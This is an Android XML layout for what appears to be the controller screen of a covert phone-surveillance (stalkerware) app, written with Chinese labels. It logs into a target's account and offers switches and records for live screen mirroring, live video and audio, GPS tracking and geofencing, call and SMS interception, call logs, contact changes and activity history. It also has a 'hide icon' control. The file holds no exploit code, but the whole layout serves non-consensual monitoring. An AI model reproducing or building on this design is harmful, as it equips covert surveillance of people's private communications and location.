<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:id="@+id/MainActivityRelativeLayout"
    android:background="@color/page_bg"
    android:orientation="vertical">

    <include layout="@layout/incloud_layout" />

    <com.tencent.rtmp.ui.TXCloudVideoView
        android:id="@+id/MainActivity1_main_local"
        android:layout_width="@dimen/dp_1"
        android:layout_height="@dimen/dp_1"
        android:visibility="invisible"/>
    <ScrollView
        android:layout_width="match_parent"
        android:layout_height="match_parent"
        android:fillViewport="true"
        android:scrollbars="none">
        <LinearLayout
            android:layout_width="match_parent"
            android:layout_height="match_parent"
            android:orientation="vertical"
            android:id="@+id/Main_touch">
            <LinearLayout
                android:id="@+id/MainActivity_isLogin"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="vertical">
                <!--登录-->
                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:background="@color/white"
                    android:orientation="vertical"
                    android:layout_marginBottom="@dimen/dp_20">
                    <com.example.myapplication.view.LastInputEditText
                        android:id="@+id/MainActivity_logePhone"
                        android:layout_width="match_parent"
                        android:layout_height="@dimen/dp_50"
                        android:background="@drawable/loge_edit_xiahua"
                        android:layout_marginTop="@dimen/dp_10"
                        android:hint="请输入对方账号"
                        android:textColor="@color/black"
                        android:textCursorDrawable="@drawable/cursor_style"
                        android:layout_marginLeft="@dimen/dp_20"
                        android:layout_marginRight="@dimen/dp_20" />
                    <View
                        android:layout_width="match_parent"
                        android:layout_height="0.5dp"
                        android:background="@color/gray_line"/>
                    <com.example.myapplication.view.LastInputEditText
                        android:id="@+id/MainActivity_logePwd"
                        android:layout_width="match_parent"
                        android:layout_height="@dimen/dp_50"
                        android:background="@drawable/loge_edit_xiahua"
                        android:layout_marginTop="@dimen/dp_10"
                        android:hint="请输入对方密码"
                        android:textColor="@color/black"
                        android:textCursorDrawable="@drawable/cursor_style"
                        android:inputType="textPassword"
                        android:digits="1234567890"
                        android:minLines="6"
                        android:layout_marginLeft="@dimen/dp_20"
                        android:layout_marginRight="@dimen/dp_20" />
                </LinearLayout>
                <androidx.appcompat.widget.AppCompatButton
                    android:id="@+id/MainActivity_login"
                    android:layout_width="match_parent"
                    android:layout_height="wrap_content"
                    android:layout_gravity="center_horizontal"
                    android:layout_marginLeft="20dp"
                    android:layout_marginRight="20dp"
                    android:background="@drawable/loge_btn_background"
                    android:text="确定"
                    android:textColor="@color/white"
                    android:textSize="18sp" />
            </LinearLayout>
            <LinearLayout
                android:id="@+id/MainActivity_isLogin1"
                android:layout_width="match_parent"
                android:layout_height="wrap_content"
                android:orientation="vertical"
                android:visibility="gone">
                <LinearLayout
                    android:layout_width="match_parent"
                    android:layout_height="@dimen/dp_50"
                    android:orientation="horizontal"
                    android:layout_gravity="center_vertical"
                    android:gravity="center_vertical"
                    android:layout_below="@+id/screen_tc_cloud_view_main_F"
                    android:background="@color/white">
                    <TextView
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="账号: "
                        android:gravity="center_vertical"
                        android:layout_marginLeft="@dimen/dp_20"
                        android:textSize="@dimen/sp_18"
                        android:textColor="@color/black"/>
                    <TextView
                        android:id="@+id/MainActivity_isLogin1_phone"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text=""
                        android:gravity="center_vertical"
                        android:textSize="@dimen/sp_18"
                        android:textColor="@color/black"/>
                </LinearLayout>
            </LinearLayout>

            <!--手机位置刷新-->
            <RelativeLayout
                android:id="@+id/MainActivity_PhoneRelativeLayout"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical"
                android:background="@color/white"
                android:visibility="gone">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="手机位置"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:id="@+id/MainActivity_PhoneLinearLayout"
                    android:layout_width="@dimen/dp_45"
                    android:layout_height="match_parent"
                    android:orientation="vertical"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_alignParentRight="true"
                    android:layout_marginTop="@dimen/dp_13"
                    android:layout_marginBottom="@dimen/dp_13"
                    android:background="@drawable/main_phone_weizhibg">
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:gravity="center"
                        android:text="刷新"
                        android:textSize="@dimen/sp_12"
                        android:textColor="@color/f999999"/>
                </LinearLayout>

            </RelativeLayout>
            <!--手机位置-->
            <LinearLayout
                android:id="@+id/MainActivity_PhoneLinearLayoutWeiZhi"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical"
                android:background="@color/white"
                android:visibility="gone">

                <TextView
                    android:id="@+id/MainActivity_PhoneTextViewWeiZhi"
                    android:layout_width="0dp"
                    android:layout_weight="1"
                    android:layout_height="match_parent"
                    android:text="未获取位置,请打开对方手机定位"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_12"
                    android:textColor="@color/black"/>
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="导航追踪"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_12"
                    android:textColor="@color/f999999"/>
                <ImageView
                    android:layout_width="@dimen/dp_20"
                    android:layout_height="@dimen/dp_20"
                    android:background="@mipmap/right_arrow"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/sp_20" />
            </LinearLayout>
            <View
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_10"/>
            <!-- 获取实时同屏-->
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical"
                android:layout_below="@+id/screen_tc_cloud_view_main_F"
                android:background="@color/white">
                <View
                    android:layout_width="match_parent"
                    android:layout_height="0.5dp"
                    android:background="@color/gray_line"/>
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="实时同屏"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:id="@+id/MainActivity1_HuoqRelativeLayoutImage"
                    android:layout_width="@dimen/dp_50"
                    android:layout_height="@dimen/dp_25"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_marginTop="@dimen/dp_15"
                    android:background="@drawable/activity_main_bg">
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:text="同屏"
                        android:textSize="@dimen/sp_12"
                        android:gravity="center"
                        android:padding="5dp"
                        android:textColor="@color/f999999"
                        />
                </LinearLayout>
            </RelativeLayout>
            <!-- 实时视频-->
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <View
                    android:layout_width="match_parent"
                    android:layout_height="0.5dp"
                    android:background="@color/gray_line"/>
                <TextView
                    android:id="@+id/MainActivity1_ScreenRecordingTextView"
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="实时视频"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:id="@+id/MainActivity1_ScreenRecordingSwitch"
                    android:layout_width="@dimen/dp_50"
                    android:layout_height="@dimen/dp_25"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_marginTop="@dimen/dp_15"
                    android:background="@drawable/activity_main_bg">
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:text="追踪"
                        android:textSize="@dimen/sp_12"
                        android:gravity="center"
                        android:padding="5dp"
                        android:textColor="@color/f999999"
                        />
                </LinearLayout>
            </RelativeLayout>
            <!-- 实时音频-->
            <RelativeLayout
                android:id="@+id/MainActivity1_ScreenRecordingRelativeLayout2"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <View
                    android:layout_width="match_parent"
                    android:layout_height="0.5dp"
                    android:background="@color/gray_line"/>
                <TextView
                    android:id="@+id/MainActivity1_ScreenRecordingTextView2"
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="实时音频"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:id="@+id/MainActivity1_ScreenRecordingSwitch2"
                    android:layout_width="@dimen/dp_50"
                    android:layout_height="@dimen/dp_25"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_marginTop="@dimen/dp_15"
                    android:background="@drawable/activity_main_bg">
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:text="追踪"
                        android:textSize="@dimen/sp_12"
                        android:gravity="center"
                        android:padding="5dp"
                        android:textColor="@color/f999999"
                        />
                </LinearLayout>
            </RelativeLayout>

            <View
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_6"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="隐藏图标"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="@dimen/dp_50"
                    android:layout_height="@dimen/dp_25"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_marginTop="@dimen/dp_15"
                    android:background="@drawable/activity_main_bg">
                    <TextView
                        android:id="@+id/MainActivity_HideTheDisplaySwitch"
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:text="隐藏"
                        android:textSize="@dimen/sp_12"
                        android:gravity="center"
                        android:padding="5dp"
                        android:textColor="@color/f999999"
                        />
                </LinearLayout>
            </RelativeLayout>
            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="足迹"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <TextView
                        android:id="@+id/MainActivity_WalkingTrajectoryHistory"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="记录"
                        android:layout_toLeftOf="@id/MainActivity_WalkingTrajectorySwitch"
                        android:layout_alignParentBottom="true"
                        android:paddingTop="@dimen/dp_17"
                        android:layout_marginRight="@dimen/dp_15"
                        android:textColor="@color/f999999"
                        android:textSize="@dimen/sp_14" />
                    <LinearLayout
                        android:layout_width="@dimen/dp_50"
                        android:layout_height="@dimen/dp_25"
                        android:layout_alignParentRight="true"
                        android:layout_marginRight="@dimen/dp_20"
                        android:layout_marginTop="@dimen/dp_15"
                        android:background="@drawable/activity_main_bg">
                        <TextView
                            android:id="@+id/MainActivity_WalkingTrajectorySwitch"
                            android:layout_width="match_parent"
                            android:layout_height="match_parent"
                            android:text="开启"
                            android:textSize="@dimen/sp_12"
                            android:gravity="center"
                            android:padding="5dp"
                            android:textColor="@color/f999999"
                            />
                    </LinearLayout>
                </LinearLayout>

            </RelativeLayout>
            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:id="@+id/MainActivity_PhoneMonitoringRelativeLayout"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="电话监听"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <TextView
                        android:id="@+id/MainActivity_PhoneMonitoringRecording"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="记录"
                        android:layout_toLeftOf="@id/MainActivity_WalkingTrajectorySwitch"
                        android:layout_alignParentBottom="true"
                        android:paddingTop="@dimen/dp_17"
                        android:layout_marginRight="@dimen/dp_15"
                        android:textColor="@color/f999999"
                        android:textSize="@dimen/sp_14" />
                    <LinearLayout
                        android:layout_width="@dimen/dp_50"
                        android:layout_height="@dimen/dp_25"
                        android:layout_alignParentRight="true"
                        android:layout_marginRight="@dimen/dp_20"
                        android:layout_marginTop="@dimen/dp_15"
                        android:background="@drawable/activity_main_bg">

                        <TextView
                            android:id="@+id/MainActivity_PhoneMonitoringSwitch"
                            android:layout_width="match_parent"
                            android:layout_height="match_parent"
                            android:text="开启"
                            android:textSize="@dimen/sp_12"
                            android:gravity="center"
                            android:padding="5dp"
                            android:textColor="@color/f999999"
                            />
                    </LinearLayout>
                </LinearLayout>
            </RelativeLayout>

            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:id="@+id/MainActivity_SMSRelativeLayout"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="短信监听"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <TextView
                        android:id="@+id/MainActivity_SMSRecording"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="记录"
                        android:layout_toLeftOf="@id/MainActivity_WalkingTrajectorySwitch"
                        android:layout_alignParentBottom="true"
                        android:paddingTop="@dimen/dp_17"
                        android:layout_marginRight="@dimen/dp_15"
                        android:textColor="@color/f999999"
                        android:textSize="@dimen/sp_14" />
                    <LinearLayout
                        android:layout_width="@dimen/dp_50"
                        android:layout_height="@dimen/dp_25"
                        android:layout_alignParentRight="true"
                        android:layout_marginRight="@dimen/dp_20"
                        android:layout_marginTop="@dimen/dp_15"
                        android:background="@drawable/activity_main_bg">
                        <TextView
                            android:id="@+id/MainActivity_SMSSwitch"
                            android:layout_width="match_parent"
                            android:layout_height="match_parent"
                            android:text="开启"
                            android:textSize="@dimen/sp_12"
                            android:gravity="center"
                            android:padding="5dp"
                            android:textColor="@color/f999999"
                            />
                    </LinearLayout>
                </LinearLayout>

            </RelativeLayout>


            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:id="@+id/MainActivity_CallLogRelativeLayout"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="通话记录"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <TextView
                        android:id="@+id/MainActivity_CallLogRecording"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="记录"
                        android:layout_toLeftOf="@id/MainActivity_WalkingTrajectorySwitch"
                        android:layout_alignParentBottom="true"
                        android:paddingTop="@dimen/dp_17"
                        android:layout_marginRight="@dimen/dp_15"
                        android:textColor="@color/f999999"
                        android:textSize="@dimen/sp_14" />
                    <LinearLayout
                        android:layout_width="@dimen/dp_50"
                        android:layout_height="@dimen/dp_25"
                        android:layout_alignParentRight="true"
                        android:layout_marginRight="@dimen/dp_20"
                        android:layout_marginTop="@dimen/dp_15"
                        android:background="@drawable/activity_main_bg">
                        <TextView
                            android:id="@+id/MainActivity_CallLogSwitch"
                            android:layout_width="match_parent"
                            android:layout_height="match_parent"
                            android:text="开启"
                            android:textSize="@dimen/sp_12"
                            android:gravity="center"
                            android:padding="5dp"
                            android:textColor="@color/f999999"
                            />
                    </LinearLayout>
                </LinearLayout>
            </RelativeLayout>

            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:id="@+id/MainActivity_ContactsRelativeLayout"
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="通讯录变化"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <TextView
                        android:id="@+id/MMainActivity_ContactsRecording"
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:text="记录"
                        android:layout_toLeftOf="@id/MainActivity_WalkingTrajectorySwitch"
                        android:layout_alignParentBottom="true"
                        android:paddingTop="@dimen/dp_17"
                        android:layout_marginRight="@dimen/dp_15"
                        android:textColor="@color/f999999"
                        android:textSize="@dimen/sp_14" />
                    <LinearLayout
                        android:layout_width="@dimen/dp_50"
                        android:layout_height="@dimen/dp_25"
                        android:layout_alignParentRight="true"
                        android:layout_marginRight="@dimen/dp_20"
                        android:layout_marginTop="@dimen/dp_15"
                        android:background="@drawable/activity_main_bg">
                        <TextView
                            android:id="@+id/MainActivity_ContactsSwitch"
                            android:layout_width="match_parent"
                            android:layout_height="match_parent"
                            android:text="开启"
                            android:textSize="@dimen/sp_12"
                            android:gravity="center"
                            android:padding="5dp"
                            android:textColor="@color/f999999"
                            />
                    </LinearLayout>
                </LinearLayout>

            </RelativeLayout>
            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="手机行为记录"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:orientation="horizontal"
                    android:layout_alignParentRight="true"
                    >
                    <LinearLayout
                        android:layout_width="wrap_content"
                        android:layout_height="match_parent"
                        android:orientation="horizontal"
                        android:layout_alignParentRight="true"
                        >
                        <TextView
                            android:id="@+id/MainActivity_PhoneSoftwareHistory"
                            android:layout_width="wrap_content"
                            android:layout_height="match_parent"
                            android:text="记录"
                            android:layout_toLeftOf="@id/MainActivity_HistorySwitch1"
                            android:layout_alignParentBottom="true"
                            android:paddingTop="@dimen/dp_17"
                            android:layout_marginRight="@dimen/dp_15"
                            android:textColor="@color/f999999"
                            android:textSize="@dimen/sp_14" />
                        <LinearLayout
                            android:layout_width="@dimen/dp_50"
                            android:layout_height="@dimen/dp_25"
                            android:layout_alignParentRight="true"
                            android:layout_marginRight="@dimen/dp_20"
                            android:layout_marginTop="@dimen/dp_15"
                            android:background="@drawable/activity_main_bg">
                            <TextView
                                android:id="@+id/MainActivity_HistorySwitch1"
                                android:layout_width="match_parent"
                                android:layout_height="match_parent"
                                android:text="开启"
                                android:textSize="@dimen/sp_12"
                                android:gravity="center"
                                android:padding="5dp"
                                android:textColor="@color/f999999"
                                />
                        </LinearLayout>
                    </LinearLayout>

                </LinearLayout>

            </RelativeLayout>

<!--            <View-->
<!--                android:layout_width="match_parent"-->
<!--                android:layout_height="1dp"-->
<!--                android:background="@color/gray_line"/>-->
<!--            <RelativeLayout-->
<!--                android:layout_width="match_parent"-->
<!--                android:layout_height="@dimen/dp_50"-->
<!--                android:orientation="horizontal"-->
<!--                android:background="@color/white"-->
<!--                android:layout_gravity="center_vertical"-->
<!--                android:gravity="center_vertical">-->
<!--                <TextView-->
<!--                    android:layout_width="wrap_content"-->
<!--                    android:layout_height="match_parent"-->
<!--                    android:text="操作记录"-->
<!--                    android:gravity="center_vertical"-->
<!--                    android:layout_marginLeft="@dimen/dp_20"-->
<!--                    android:textSize="@dimen/sp_18"-->
<!--                    android:textColor="@color/black"/>-->
<!--                <LinearLayout-->
<!--                    android:id="@+id/MainActivity_Recordofoperations"-->
<!--                    android:layout_width="@dimen/dp_50"-->
<!--                    android:layout_height="@dimen/dp_25"-->
<!--                    android:layout_alignParentRight="true"-->
<!--                    android:layout_marginRight="@dimen/dp_20"-->
<!--                    android:layout_marginTop="@dimen/dp_15"-->
<!--                    android:background="@drawable/activity_main_bg">-->
<!--                    <TextView-->
<!--                        android:layout_width="match_parent"-->
<!--                        android:layout_height="match_parent"-->
<!--                        android:text="查看"-->
<!--                        android:textSize="@dimen/sp_12"-->
<!--                        android:gravity="center"-->
<!--                        android:padding="5dp"-->
<!--                        android:textColor="@color/f999999"-->
<!--                        />-->
<!--                </LinearLayout>-->
<!--            </RelativeLayout>-->
            <View
                android:layout_width="match_parent"
                android:layout_height="1dp"
                android:background="@color/gray_line"/>
            <RelativeLayout
                android:layout_width="match_parent"
                android:layout_height="@dimen/dp_50"
                android:orientation="horizontal"
                android:background="@color/white"
                android:layout_gravity="center_vertical"
                android:gravity="center_vertical">
                <TextView
                    android:layout_width="wrap_content"
                    android:layout_height="match_parent"
                    android:text="电子围栏"
                    android:gravity="center_vertical"
                    android:layout_marginLeft="@dimen/dp_20"
                    android:textSize="@dimen/sp_18"
                    android:textColor="@color/black"/>
                <LinearLayout
                    android:id="@+id/MainActivity_ElectronicFence"
                    android:layout_width="@dimen/dp_50"
                    android:layout_height="@dimen/dp_25"
                    android:layout_alignParentRight="true"
                    android:layout_marginRight="@dimen/dp_20"
                    android:layout_marginTop="@dimen/dp_15"
                    android:background="@drawable/activity_main_bg">
                    <TextView
                        android:layout_width="match_parent"
                        android:layout_height="match_parent"
                        android:text="查看"
                        android:textSize="@dimen/sp_12"
                        android:gravity="center"
                        android:padding="5dp"
                        android:textColor="@color/f999999"
                        />
                </LinearLayout>
            </RelativeLayout>

        </LinearLayout>
    </ScrollView>

</LinearLayout>